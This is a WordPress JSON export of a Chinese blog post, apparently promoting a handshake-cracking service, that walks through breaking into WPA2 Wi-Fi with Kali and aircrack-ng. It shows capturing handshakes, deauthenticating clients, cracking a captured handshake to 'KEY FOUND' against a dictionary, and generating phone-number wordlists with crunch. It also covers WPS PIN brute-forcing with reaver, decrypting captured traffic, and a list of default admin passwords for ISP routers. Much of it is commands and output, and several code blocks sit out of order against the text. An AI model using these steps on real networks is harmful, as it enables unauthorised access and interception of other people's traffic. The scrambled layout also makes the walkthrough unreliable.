{"id":842,"date":"2024-03-15T19:22:34","date_gmt":"2024-03-15T11:22:34","guid":{"rendered":"http:\/\/www.ccwifi.cc\/blogs\/?p=842"},"modified":"2024-03-15T19:22:34","modified_gmt":"2024-03-15T11:22:34","slug":"%e4%bd%bf%e7%94%a8kali%e7%b3%bb%e7%bb%9f%e8%bf%9b%e8%a1%8c%e6%97%a0%e7%ba%bf%e7%bd%91%e7%bb%9c%e7%a0%b4%e8%a7%a3","status":"publish","type":"post","link":"https:\/\/www.ccwifi.cc\/blogs\/2024\/03\/15\/%e4%bd%bf%e7%94%a8kali%e7%b3%bb%e7%bb%9f%e8%bf%9b%e8%a1%8c%e6%97%a0%e7%ba%bf%e7%bd%91%e7%bb%9c%e7%a0%b4%e8%a7%a3\/","title":{"rendered":"\u4f7f\u7528Kali\u7cfb\u7edf\u8fdb\u884c\u65e0\u7ebf\u7f51\u7edc\u7834\u89e3"},"content":{"rendered":"
\n

\u5728\u7ebfwifi\u8dd1\u5305 \u91d1\u521a\u5305\u8dd1\u5305 cap\u8dd1\u5305 hccapx ewsa\u5728\u7ebf \u5c31\u6765 \u63e1\u624b\u5305\u8dd1\u5305<\/a><\/strong><\/p>\n

\u5404\u4f4d\u597d \u53c8\u89c1\u9762\u4e86 \u6211\u662f\u66f9\u64cd \u4eca\u5929\u7ed9\u5927\u5bb6\u5e26\u6765\u4e00\u7bc7\u65b0\u7684\u6559\u7a0b<\/p>\n

\u5e0c\u671b\u5404\u4f4d\u7ec6\u5fc3\u5b66\u4e60 \u4f4e\u8c03\u7528\u7f51<\/p>\n<\/div>\n

FROM kalilinux\/kali-last-release\nRUN apt update && apt install -y pciutils net-tools procps crunch wordlists aircrack-ng reaver\nWORKDIR \/root\/workspace<\/code><\/pre>\n
0x00 \u5f15\u8a00
\nKali\u662f\u4e00\u79cd\u5e38\u7528\u4e8e\u6e17\u900f\u6d4b\u8bd5\u7684Linux\u53d1\u884c\u7248\uff0c\u5b83\u96c6\u6210\u4e86\u591a\u79cd\u5b89\u5168\u5de5\u5177\u3002\u672c\u6587\u5c06\u4ecb\u7ecd\u5982\u4f55\u4f7f\u7528Docker\u5b89\u88c5Kali\uff0c\u5e76\u8fdb\u884cWifi\u5bc6\u7801\u7834\u89e3\u3002\u8bf7\u6ce8\u610f\uff0c\u672c\u6587\u4ec5\u7528\u4e8e\u6280\u672f\u7814\u7a76\uff0c\u5207\u52ff\u7528\u4e8e\u975e\u6cd5\u7528\u9014\u3002<\/p>\n
0x01 \u5728Docker\u4e2d\u5b89\u88c5Kali\u7cfb\u7edf
\nKali\u5b98\u65b9\u63d0\u4f9b\u4e86Docker\u955c\u50cf\uff1akalilinux\/kali-last-release\u3002\u7136\u800c\uff0c\u8be5\u955c\u50cf\u5e76\u672a\u5305\u542b\u6240\u6709\u5de5\u5177\uff0c\u5982\u679c\u8981\u5b89\u88c5\u5168\u90e8\u5de5\u5177\uff0c\u955c\u50cf\u5927\u5c0f\u5c06\u8d85\u8fc74G\u3002\u663e\u7136\uff0c\u5e76\u975e\u6240\u6709\u4eba\u90fd\u9700\u8981\u8fd9\u4e48\u591a\u5de5\u5177\u3002\u56e0\u6b64\uff0c\u7528\u6237\u53ef\u4ee5\u6839\u636e\u9700\u8981\u7f16\u5199Dockerfile\u6765\u5b9a\u5236\u4e0d\u540c\u7684Kali\u955c\u50cf\u3002<\/p>\n
\u5bf9\u4e8eWifi\u5bc6\u7801\u7834\u89e3\uff0c\u53ef\u4ee5\u7f16\u5199\u4ee5\u4e0bDockerfile\u3002<\/p>\n
$ sudo docker build -t kali .\n$ sudo docker run -it --net=\"host\" --privileged -v $(pwd)\/workspace:\/root\/workspace kali\n\u250c\u2500\u2500(root\u327fdrunkdream-LB0)-[~\/workspace]\n\u2514\u2500#<\/code><\/pre>\n
\u2514\u2500# airmon-ng                                                                                                  \nYour kernel has module support but you don't have modprobe installed.\nIt is highly recommended to install modprobe (typically from kmod).\nYour kernel has module support but you don't have modinfo installed.\nIt is highly recommended to install modinfo (typically from kmod).\nWarning: driver detection without modinfo may yield inaccurate results.\nPHY     Interface       Driver          Chipset\nphy0    wlp0s20f3       iwlwifi         Intel Corporation Comet Lake PCH CNVi WiFi<\/code><\/pre>\n
\u590d\u5236 \u590d\u5236 \u8fd0\u884c\u65f6\u7f51\u7edc\u9700\u8981\u4f7f\u7528host\u6a21\u5f0f\uff0c\u4ee5\u4fbf\u8bbf\u95ee\u5bbf\u4e3b\u673a\u4e0a\u7684\u65e0\u7ebf\u7f51\u5361\uff0c\u5e76\u5f00\u542f\u7279\u6743\u6a21\u5f0f\u3002\u4e3a\u4e86\u5b9e\u73b0\u6570\u636e\u6301\u4e45\u5316\u5b58\u50a8\uff0c\u53ef\u4ee5\u5c06\u672c\u5730\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\u3002<\/p>\n
\u63a5\u4e0b\u6765\u7684\u6240\u6709\u64cd\u4f5c\u90fd\u5c06\u5728\u8be5\u5bb9\u5668\u4e2d\u8fdb\u884c\u3002<\/p>\n
0x02 Wifi\u5bc6\u7801\u7834\u89e3
\n\u5728\u8fd9\u91cc\uff0c\u6211\u4eec\u5c06\u4e3b\u8981\u4f7f\u7528aircrack-ng\u7cfb\u5217\u547d\u4ee4\u6765\u7834\u89e3Wifi\u5bc6\u7801\u3002<\/p>\n
\u2514\u2500# airmon-ng start wlp0s20f3\nYour kernel has module support but you don't have modprobe installed.\nIt is highly recommended to install modprobe (typically from kmod).\nYour kernel has module support but you don't have modinfo installed.\nIt is highly recommended to install modinfo (typically from kmod).\nWarning: driver detection without modinfo may yield inaccurate results.\nPHY     Interface       Driver          Chipset\nphy0    wlp0s20f3       iwlwifi         Intel Corporation Comet Lake PCH CNVi WiFi\n                (mac80211 monitor mode vif enabled for [phy0]wlp0s20f3 on [phy0]wlp0s20f3mon)\n                (mac80211 station mode vif disabled for [phy0]wlp0s20f3)<\/code><\/pre>\n
\u2514\u2500# airodump-ng wlp0s20f3mon\nWarning: Detected you are using a non-UNICODE terminal character encoding.\n CH 11 ][ Elapsed: 24 s ][ 2022-05-22 15:36                                                                    \n BSSID              PWR  Beacons    #Data, #\/s  CH   MB   ENC CIPHER  AUTH ESSID                               \n 74:CF:00:DA:F4:40  -11       15        0    0   2  130   WPA2 CCMP   PSK  CMCC-X5qG                         \n 8C:53:C3:C8:16:E6  -13       18        4    0   1  130   WPA2 CCMP   PSK  Xiaomi_16E4<\/code><\/pre>\n
\u2514\u2500# airodump-ng -c 2 --bssid 74:CF:00:DA:F4:40 -w dump wlp0s20f3mon\n CH  2 ][ Elapsed: 18 s ][ 2022-05-22 16:04 ][ WPA handshake: 74:CF:00:DA:F4:40\n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH   MB   ENC CIPHER  AUTH ESSID                           \n 74:CF:00:DA:F4:40  -13 100      215       15    0   2  130   WPA2 CCMP   PSK  CMCC-X5qG                      \n BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                             \n 74:CF:00:DA:F4:40  1C:2A:DB:0E:D5:AC  -29   6e- 6e  1921    478     EAPOL  drunkdream<\/code><\/pre>\n
\u590d\u5236 \u590d\u5236 \u6b64\u65f6\uff0c\u60a8\u5c06\u65e0\u6cd5\u5728\u5bbf\u4e3b\u673a\u7cfb\u7edf\u4e2d\u770b\u5230\u8be5\u65e0\u7ebf\u7f51\u5361\uff0c\u76f8\u53cd\uff0c\u4f1a\u591a\u51fa\u4e00\u4e2a\u540d\u4e3awlp0s20f3mon\u7684\u8bbe\u5907\u3002\u6b64\u65f6\uff0c\u9700\u8981\u5728\u7f51\u5361\u540d\u540e\u9762\u52a0\u4e0amon\u3002<\/p>\n
\u901a\u8fc7\u8be5\u547d\u4ee4\uff0c\u60a8\u53ef\u4ee5\u83b7\u53d6\u9644\u8fd1\u7684Wifi\u5217\u8868\u3002<\/p>\n
\u7528\u6cd5\uff1aairodump-ng -c <\u9891\u9053> –bssid  -w <\u8f93\u51fa\u6587\u4ef6\u540d><\/bssid><\/p>\n
# ls -l | grep dump\n-rwxrwxrwx 1 1000 1000      225870 May 22 23:30 dump-01.cap\n-rwxrwxrwx 1 1000 1000         883 May 22 23:30 dump-01.csv\n-rwxrwxrwx 1 1000 1000         601 May 22 23:30 dump-01.kismet.csv\n-rwxrwxrwx 1 1000 1000        7330 May 22 23:30 dump-01.kismet.netxml\n-rwxrwxrwx 1 1000 1000       92078 May 22 23:30 dump-01.log.csv<\/code><\/pre>\n
\u590d\u5236 \u4f7f\u7528\u6b64\u547d\u4ee4\u53ef\u4ee5\u83b7\u53d6\u8fde\u63a5\u5230\u6307\u5b9aWifi\u7684\u5ba2\u6237\u7aef\u5217\u8868\u3002\u5f53\u6355\u83b7\u5230\u63e1\u624b\u5305\u65f6\uff0c\u4f1a\u63d0\u793a”WPA handshake: 74:CF:00:DA:F4:40″\u8fd9\u6837\u7684\u5b57\u7b26\u4e32\uff0c\u8fd9\u65f6\u53ef\u4ee5\u505c\u6b62\u6570\u636e\u6355\u83b7\u3002\u6b64\u65f6\uff0c\u6570\u636e\u5305\u5c06\u4fdd\u5b58\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\uff1a<\/p>\n
\u2514\u2500# aireplay-ng -02 -a 74:CF:00:DA:F4:40 -c 1C:2A:DB:0E:D5:AC wlp0s20f3mon\n16:11:07  Waiting for beacon frame (BSSID: 74:CF:00:DA:F4:40) on channel 2\n16:11:07  Sending 64 directed DeAuth (code 7). STMAC: [1C:2A:DB:0E:D5:AC] [ 0| 2 ACKs]                         \n16:11:08  Sending 64 directed DeAuth (code 7). STMAC: [1C:2A:DB:0E:D5:AC] [ 4|197 ACKs]<\/code><\/pre>\n
\u2514\u2500# airmon-ng stop wlp0s20f3mon<\/code><\/pre>\n
\u2514\u2500# aircrack-ng -a2 -b 74:CF:00:DA:F4:40 -w password.dict dump-01.cap\nReading packets, please wait...\nOpening dump-01.cap\nRead 1734 packets.\n1 potential targets\n                         Aircrack-ng 1.6 \n      [00:00:00] 3\/5 keys tested (71.89 k\/s) \n      Time left: 0 seconds                                      60.00%\n                         KEY FOUND! [ 12345678 ]\n      Master Key     : 1E 30 C1 07 43 14 93 F2 74 D3 6D 8E F3 E2 E1 07 \n                       18 4C 47 01 1F 87 D6 87 A7 0A 49 01 C0 24 F5 A1 \n      Transient Key  : C4 D6 53 3B DA C8 D4 23 D5 7D 82 EE 73 67 7D 3D \n                       6B 6B 04 BF B1 66 29 74 3E E1 CB FD 8C 90 6B E8 \n                       DE 0D 8C 32 21 3E 8E F0 9D 1A 2B 76 BB 0E 3E FD \n                       EB 95 8C 7D C0 43 90 12 4E 3D A4 A5 F2 75 CF FF \n      EAPOL HMAC     : 21 B2 AA 47 4F AB E3 77 53 24 73 21 7E 06 78 10<\/code><\/pre>\n
\u590d\u5236 \u5982\u679c\u5ba2\u6237\u7aef\u4e00\u76f4\u6b63\u5e38\u8fde\u63a5\uff0c\u5f88\u96be\u6355\u83b7\u5230\u63e1\u624b\u5305\u3002\u8fd9\u65f6\u9700\u8981\u5c06\u5ba2\u6237\u7aef\u8e22\u4e0b\u7ebf\u3002<\/p>\n
\u7528\u6cd5\uff1aaireplay-ng -0 <\u91cd\u53d1\u6b21\u6570> -a  -c <\u5ba2\u6237\u7aef\u7684MAC\u5730\u5740><\/ap\u7684bssid><\/p>\n
\u6267\u884c\u6b64\u64cd\u4f5c\u65f6\uff0c\u9700\u8981\u786e\u4fdd\u4e0a\u4e00\u6b65\u9aa4\u7684\u547d\u4ee4\u540c\u65f6\u5728\u6267\u884c\u3002<\/p>\n
\u6355\u83b7\u5230\u63e1\u624b\u5305\u7684.cap\u6587\u4ef6\u540e\uff0c\u5c31\u53ef\u4ee5\u79bb\u7ebf\u7834\u89e3Wifi\u5bc6\u7801\u4e86\u3002\u4f8b\u5982\uff0c\u53ef\u4ee5\u4f7f\u7528\u6027\u80fd\u8f83\u597d\u7684\u8ba1\u7b97\u673a\u6216\u5206\u5e03\u5f0f\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\u3002<\/p>\n
\u7528\u6cd5\uff1aaircrack-ng -w <\u5bc6\u7801\u5b57\u5178> <\u6355\u83b7\u7684.cap\u6587\u4ef6><\/p>\n
\u590d\u5236 password.dict\u662f\u5bc6\u7801\u5b57\u5178\uff0c\u7834\u89e3\u6210\u529f\u4e0e\u5426\u53d6\u51b3\u4e8e\u5bc6\u7801\u662f\u5426\u5305\u542b\u5728\u5b57\u5178\u4e2d\u3002\u56e0\u6b64\uff0c\u5bf9\u4e8e\u8fc7\u4e8e\u590d\u6742\u7684\u5bc6\u7801\uff0c\u7834\u89e3\u6210\u529f\u7387\u4f1a\u975e\u5e38\u4f4e\u3002<\/p>\n
\u4e3a\u4e86\u63d0\u9ad8\u7834\u89e3\u6210\u529f\u7387\uff0c\u53ef\u4ee5\u6839\u636e\u5177\u4f53\u573a\u666f\u751f\u6210\u6709\u9488\u5bf9\u6027\u7684\u5bc6\u7801\u5b57\u5178\uff0c\u4f8b\u5982\u4f7f\u7528\u751f\u65e5\u3001\u624b\u673a\u53f7\u7b49\u4fe1\u606f\u3002\u8fd9\u91cc\u4f7f\u7528crunch\u547d\u4ee4\u6765\u751f\u6210\u5bc6\u7801\u5b57\u5178\u3002<\/p>\n
\u4f7f\u7528\u8bed\u6cd5\u548c\u53c2\u6570\uff1a<\/p>\n
\u2514\u2500# crunch 11 11 -t 136%%%%%%%% -o 136.txt\nCrunch will now generate the following amount of data: 1200000000 bytes\n1144 MB\n1 GB\n0 TB\n0 PB\nCrunch will now generate the following number of lines: 100000000 \ncrunch:   7% completed generating output\ncrunch:  15% completed generating output\ncrunch:  22% completed generating output\ncrunch:  29% completed generating output\ncrunch:  36% completed generating output\ncrunch:  43% completed generating output\ncrunch:  51% completed generating output\ncrunch:  58% completed generating output\ncrunch:  65% completed generating output\ncrunch:  72% completed generating output\ncrunch:  79% completed generating output\ncrunch:  86% completed generating output\ncrunch:  93% completed generating output\ncrunch: 100% completed generating output\n\u2514\u2500# ls -l | grep 136\n-rwxrwxrwx 1 1000 1000  1200000000 May 23 15:16 136.txt<\/code><\/pre>\n
\u2514\u2500# reaver -i wlp0s20f3mon -b D0:C7:C0:DF:2A:74 -vv<\/code><\/pre>\n
\u590d\u5236 \u4ee5\u751f\u6210\u4ee5136\u5f00\u5934\u7684\u6240\u6709\u624b\u673a\u53f7\u4e3a\u4f8b\uff1a<\/p>\n
\u2514\u2500# airdecap-ng -e drunkdream -p 12345678 dump-01.cap\nTotal number of stations seen            4\nTotal number of packets read          8838\nTotal number of WEP data packets         0\nTotal number of WPA data packets      2905\nNumber of plaintext data packets         0\nNumber of decrypted WEP  packets         0\nNumber of corrupted WEP  packets         0\nNumber of decrypted WPA  packets      2228\nNumber of bad TKIP (WPA) packets         0\nNumber of bad CCMP (WPA) packets         0<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\uff0c\u751f\u6210\u7684\u5bc6\u7801\u5b57\u5178\u76f8\u5f53\u5e9e\u5927\u3002<\/p>\n
0x03 \u7834\u89e3WPS PIN\u7801
\nWPS\uff08Wi-Fi Protected Setup\uff0cWi-Fi\u4fdd\u62a4\u8bbe\u7f6e\uff09\u662f\u7531Wi-Fi\u8054\u76df\u7ec4\u7ec7\u5b9e\u65bd\u7684\u8ba4\u8bc1\u9879\u76ee\uff0c\u65e8\u5728\u7b80\u5316\u65e0\u7ebf\u7f51\u7edc\u7684\u5b89\u5168\u52a0\u5bc6\u8bbe\u7f6e\u3002\u5728\u4f20\u7edf\u65b9\u5f0f\u4e0b\uff0c\u7528\u6237\u65b0\u5efa\u4e00\u4e2a\u65e0\u7ebf\u7f51\u7edc\u65f6\uff0c\u5fc5\u987b\u624b\u52a8\u8bbe\u7f6e\u7f51\u7edc\u540d\uff08SSID\uff09\u548c\u5b89\u5168\u5bc6\u94a5\uff0c\u7136\u540e\u5728\u5ba2\u6237\u7aef\u9a8c\u8bc1\u5bc6\u94a5\u4ee5\u9632\u6b62\u672a\u7ecf\u6388\u6743\u7684\u8bbf\u95ee\u3002Wi-Fi Protected Setup\u53ef\u4ee5\u5e2e\u52a9\u7528\u6237\u81ea\u52a8\u8bbe\u7f6e\u7f51\u7edc\u540d\uff08SSID\uff09\u548c\u914d\u7f6e\u6700\u9ad8\u7ea7\u522b\u7684WPA2\u5b89\u5168\u5bc6\u94a5\u3002\u5177\u5907WPS\u529f\u80fd\u7684\u65e0\u7ebf\u4ea7\u54c1\u901a\u5e38\u5728\u673a\u8eab\u4e0a\u8bbe\u8ba1\u6709\u4e00\u4e2aWPS\u6309\u94ae\uff0c\u7528\u6237\u53ea\u9700\u6309\u4e0b\u8be5\u6309\u94ae\u6216\u8f93\u5165\u4e2a\u4eba\u8bc6\u522b\u53f7\u7801\uff08PIN\uff09\uff0c\u7136\u540e\u7ecf\u8fc7\u51e0\u4e2a\u7b80\u5355\u7684\u6b65\u9aa4\u5373\u53ef\u5b8c\u6210\u65e0\u7ebf\u52a0\u5bc6\u8bbe\u7f6e\uff0c\u5e76\u5728\u5ba2\u6237\u7aef\u548c\u8def\u7531\u5668\u4e4b\u95f4\u5efa\u7acb\u8d77\u5b89\u5168\u8fde\u63a5\u3002<\/p>\n
PIN\u7801\u662f\u968f\u673a\u751f\u6210\u76848\u4f4d\u6570\u5b57\uff0c\u53ef\u4ee5\u901a\u8fc7\u7a77\u4e3e\u904d\u5386\u7684\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\u3002PIN\u7801\u7684\u7b2c8\u4f4d\u662f\u4e00\u4e2a\u6821\u9a8c\u548c\uff08checksum\uff09\uff0c\u56e0\u6b64\u9ed1\u5ba2\u53ea\u9700\u8ba1\u7b97\u51fa\u524d7\u4f4d\u5373\u53ef\u3002\u8fd9\u6837\uff0c\u552f\u4e00\u7684PIN\u7801\u6570\u91cf\u4ece1000\u4e07\u53d8\u6210\u4e86100\u4e07\u3002<\/p>\n
\u5728\u8fdb\u884cPIN\u7801\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u63a5\u5165\u70b9\uff08\u65e0\u7ebf\u8def\u7531\u5668\uff09\u5b9e\u9645\u4e0a\u662f\u8981\u627e\u51faPIN\u7684\u524d\u534a\u90e8\u5206\uff08\u524d4\u4f4d\uff09\u548c\u540e\u534a\u90e8\u5206\uff08\u540e3\u4f4d\uff09\u662f\u5426\u6b63\u786e\u3002\u5f53\u7b2c\u4e00\u6b21PIN\u8ba4\u8bc1\u8fde\u63a5\u5931\u8d25\u540e\uff0c\u8def\u7531\u5668\u4f1a\u5411\u5ba2\u6237\u7aef\u53d1\u9001\u4e00\u4e2aEAP-NACK\u4fe1\u606f\uff0c\u901a\u8fc7\u8be5\u56de\u5e94\uff0c\u653b\u51fb\u8005\u5c06\u80fd\u591f\u786e\u5b9aPIN\u7684\u524d\u534a\u90e8\u5206\u6216\u540e\u534a\u90e8\u5206\u662f\u5426\u6b63\u786e\u3002\u6362\u53e5\u8bdd\u8bf4\uff0c\u9ed1\u5ba2\u53ea\u9700\u4ece7\u4f4dPIN\u4e2d\u627e\u51fa\u4e00\u4e2a4\u4f4dPIN\u548c\u4e00\u4e2a3\u4f4dPIN\u3002\u8fd9\u6837\u4e00\u6765\uff0cPIN\u7801\u7684\u53d8\u5316\u6570\u91cf\u4ece1000\u4e07\u51cf\u5c11\u5230\u4e8611000\uff0810\u76844\u6b21\u65b9 + 10\u76843\u6b21\u65b9\uff09\u3002\u56e0\u6b64\uff0c\u5728\u5b9e\u9645\u7834\u89e3\u5c1d\u8bd5\u4e2d\uff0c\u9ed1\u5ba2\u6700\u591a\u53ea\u9700\u5c1d\u8bd511000\u6b21\u3002<\/p>\n
crunch\n[options]\nmin \u8bbe\u5b9a\u6700\u5c0f\u5b57\u7b26\u4e32\u957f\u5ea6(\u5fc5\u9009)\nmax \u8bbe\u5b9a\u6700\u5927\u5b57\u7b26\u4e32\u957f\u5ea6(\u5fc5\u9009)\n-b \u6307\u5b9a\u6587\u4ef6\u8f93\u51fa\u7684\u5927\u5c0f\uff0c\u907f\u514d\u5b57\u5178\u6587\u4ef6\u8fc7\u5927\n-c \u6307\u5b9a\u6587\u4ef6\u8f93\u51fa\u7684\u884c\u6570\uff0c\u5373\u5305\u542b\u5bc6\u7801\u7684\u4e2a\u6570\n-d \u9650\u5236\u76f8\u540c\u5143\u7d20\u51fa\u73b0\u7684\u6b21\u6570\n-e \u5b9a\u4e49\u505c\u6b62\u5b57\u7b26\uff0c\u5373\u5230\u8be5\u5b57\u7b26\u4e32\u5c31\u505c\u6b62\u751f\u6210\n-f \u8c03\u7528\u5e93\u6587\u4ef6(\/etc\/share\/crunch\/charset.lst)\n-i \u6539\u53d8\u8f93\u51fa\u683c\u5f0f\uff0c\u5373aaa,aab -> aaa,baa\n-I \u901a\u5e38\u4e0e-t\u8054\u5408\u4f7f\u7528\uff0c\u8868\u660e\u8be5\u5b57\u7b26\u4e3a\u5b9e\u4e49\u5b57\u7b26\n-m \u901a\u5e38\u4e0e-p\u642d\u914d\n-o \u5c06\u5bc6\u7801\u4fdd\u5b58\u5230\u6307\u5b9a\u6587\u4ef6\n-p \u6307\u5b9a\u5143\u7d20\u4ee5\u7ec4\u5408\u7684\u65b9\u5f0f\u8fdb\u884c\n-q \u8bfb\u53d6\u5bc6\u7801\u6587\u4ef6\uff0c\u5373\u8bfb\u53d6pass.txt\n-r \u5b9a\u4e49\u91cd\u67d0\u4e00\u5b57\u7b26\u4e32\u91cd\u65b0\u5f00\u59cb\n-s \u6307\u5b9a\u4e00\u4e2a\u5f00\u59cb\u7684\u5b57\u7b26\uff0c\u5373\u4ece\u81ea\u5df1\u5b9a\u4e49\u7684\u5bc6\u7801xxxx\u5f00\u59cb\n-t \u6307\u5b9a\u5bc6\u7801\u8f93\u51fa\u7684\u683c\u5f0f\n-u \u7981\u6b62\u6253\u5370\u767e\u5206\u6bd4(\u5fc5\u987b\u4e3a\u6700\u540e\u4e00\u4e2a\u9009\u9879)\n-z \u538b\u7f29\u751f\u6210\u7684\u5b57\u5178\u6587\u4ef6\uff0c\u652f\u6301gzip,bzip2,lzma,7z\n\u7279\u6b8a\u5b57\u7b26\n% \u4ee3\u8868\u6570\u5b57\n^ \u4ee3\u8868\u7279\u6b8a\u7b26\u53f7\n@ \u4ee3\u8868\u5c0f\u5199\u5b57\u6bcd\n, \u4ee3\u8868\u5927\u5199\u5b57\u7b26<\/code><\/pre>\n
\u590d\u5236 \u7136\u800c\uff0c\u76ee\u524d\u8fd9\u79cd\u653b\u51fb\u65b9\u6cd5\u7684\u6210\u529f\u7387\u975e\u5e38\u4f4e\uff0c\u53ea\u6709\u5c11\u6570\u975e\u5e38\u8001\u65e7\u7684\u8def\u7531\u5668\u53ef\u80fd\u5b58\u5728\u6b64\u6f0f\u6d1e\u3002<\/p>\n
0x04 \u7f51\u7edc\u6d41\u91cf\u55c5\u63a2
\n\u9996\u5148\u4f7f\u7528airodump-ng\u547d\u4ee4\u6355\u83b7\u6570\u636e\u5305\uff08\u5fc5\u987b\u5305\u542b\u63e1\u624b\u5305\u624d\u80fd\u89e3\u5bc6\uff09\uff0c\u7136\u540e\u4f7f\u7528airdecap-ng\u547d\u4ee4\u89e3\u5bc6\u6570\u636e\u5305\u3002<\/p>\n
\u7528\u6cd5\uff1aairdecap-ng -e  -p <\u5bc6\u7801> <\u6355\u83b7\u7684.cap\u6587\u4ef6><\/ssid><\/p>\n
<\/p>\n
\u590d\u5236 \u89e3\u5bc6\u540e\u7684\u6570\u636e\u5305\u5c06\u4fdd\u5b58\u5728dump-01-dec.cap\u6587\u4ef6\u4e2d\uff0c\u53ef\u4ee5\u4f7f\u7528Wireshark\u6253\u5f00\u3002\u7136\u800c\uff0c\u4e0e\u672c\u5730\u6293\u5305\u76f8\u540c\uff0c\u65e0\u6cd5\u89e3\u5bc6HTTPS\u6570\u636e\u5305\u3002\u5982\u679c\u60f3\u8981\u89e3\u5bc6HTTPS\u6570\u636e\u5305\uff0c\u53ef\u4ee5\u8003\u8651\u4f7f\u7528\u4e2d\u95f4\u4eba\u653b\u51fb\u3002<\/p>\n
0x05 \u7834\u89e3\u8def\u7531\u5668\u5bc6\u7801
\n\u83b7\u53d6\u5bc6\u7801\u540e\uff0c\u5c31\u53ef\u4ee5\u6210\u529f\u8fde\u63a5\u5230Wifi\uff0c\u5e76\u767b\u5f55\u8def\u7531\u5668\u7ba1\u7406\u9875\u9762\uff0c\u4ece\u4e2d\u83b7\u53d6\u66f4\u591a\u4fe1\u606f\u3002<\/p>\n
\u4e00\u822c\u8def\u7531\u5668\u7684IP\u5730\u5740\u4e3a\uff1a192.168.1.1\u3001192.168.10.1\u3001192.168.100.1\u7b49\u3002\u5982\u679c\u4e0d\u786e\u5b9a\uff0c\u53ef\u4ee5\u901a\u8fc7IP\u548c\u7aef\u53e3\u626b\u63cf\u6765\u5224\u65ad\u3002<\/p>\n
\u83b7\u53d6IP\u5730\u5740\u540e\uff0c\u9700\u8981\u83b7\u53d6\u767b\u5f55\u5bc6\u7801\u3002\u4ee5\u4e0b\u662f\u4e00\u4e9b\u5e38\u89c1\u7684\u9ed8\u8ba4\u5bc6\u7801\uff1a<\/p>\n
\u8def\u7531\u5668\u7c7b\u578b  \u8d26\u53f7  \u5bc6\u7801
\n\u79fb\u52a8\u5149\u732b  CMCCAdmin  aDm8H%MdA
\n\u8054\u901a\u5149\u732b  CUAdmin  CUAdmin
\n\u7535\u4fe1\u5149\u732b  telecomadmin  nE7jA%5m
\n\u534e\u4e3a  telecomadmin  admintelecom<\/p>\n
0x06 \u603b\u7ed3
\n\u7834\u89e3\u65e0\u7ebf\u7f51\u7edc\u5bc6\u7801\u7684\u5173\u952e\u662f\u6355\u83b7\u63e1\u624b\u5305\uff0c\u7136\u540e\u4f7f\u7528\u5b57\u5178\u8fdb\u884c\u79bb\u7ebf\u7834\u89e3\u3002\u56e0\u6b64\uff0c\u5b57\u5178\u4e2d\u662f\u5426\u5305\u542b\u5bc6\u7801\u6210\u4e3a\u7834\u89e3\u6210\u529f\u4e0e\u5426\u7684\u5173\u952e\u3002<\/p>\n
WPS\u662f\u53e6\u4e00\u79cd\u7834\u89e3Wifi\u5bc6\u7801\u7684\u65b9\u6cd5\uff0c\u4f46\u5b9e\u9645\u6d4b\u8bd5\u4e2d\u53d1\u73b0\u6210\u529f\u7387\u975e\u5e38\u4f4e\u3002<\/p>\n
0x07 \u53c2\u8003\u6587\u732e<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4f7f\u7528Kali\u7cfb\u7edf\u8fdb\u884c\u65e0\u7ebf\u7f51\u7edc\u7834\u89e30x00 \u524d\u8a00Kali\u662f\u4e00\u6b3e\u5e38\u7528\u4e8e\u6e17\u900f\u6d4b\u8bd5\u7684Linux\u53d1\u884c\u7248\uff0c\u96c6\u6210\u4e86\u8f83\u591a\u7684\u5b89\u5168\u5de5\u5177\u3002\u672c\u6587\u5c1d\u8bd5\u4f7f\u7528Docker\u5b89\u88c5Kali\uff0c\u5e76\u8fdb\u884cWifi\u7684\u7834\u89e3\u5de5\u4f5c\u3002\u672c\u6587\u4ec5\u505a\u6280\u672f\u7814\u7a76\uff0c\u8bf7\u52ff\u7528\u4e8e\u975e\u6cd5\u7528\u9014\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"topic":[],"class_list":["post-842","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/842","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/comments?post=842"}],"version-history":[{"count":0,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/842\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/media?parent=842"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/categories?post=842"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/tags?post=842"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/topic?post=842"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}